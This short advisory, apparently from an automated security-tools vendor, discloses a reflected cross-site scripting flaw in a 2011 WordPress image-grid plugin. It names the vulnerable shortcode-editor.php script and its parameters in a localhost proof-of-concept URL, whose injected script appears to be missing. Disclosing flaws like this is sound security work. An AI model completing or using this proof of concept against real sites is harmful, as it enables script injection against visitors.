------------------------------------------------------------------------ Software................WordPress Powerhouse Museum Collection Image Grid 0.9.1.1 Vulnerability...........Reflected Cross-site Scripting Download................http://api.powerhousemuseum.com/wordpress/ Release Date............1/24/2011 Tested On...............Windows 7 + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in WordPress Powerhouse Museum Collection Image Grid 0.9.1.1 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/wordpress/wp-content/plugins/powerhouse-museum-collection-image-grid/shortcode-editor.php?tbpv_id=x&tbpv_username=&tbpv_domain=&tbpv_login=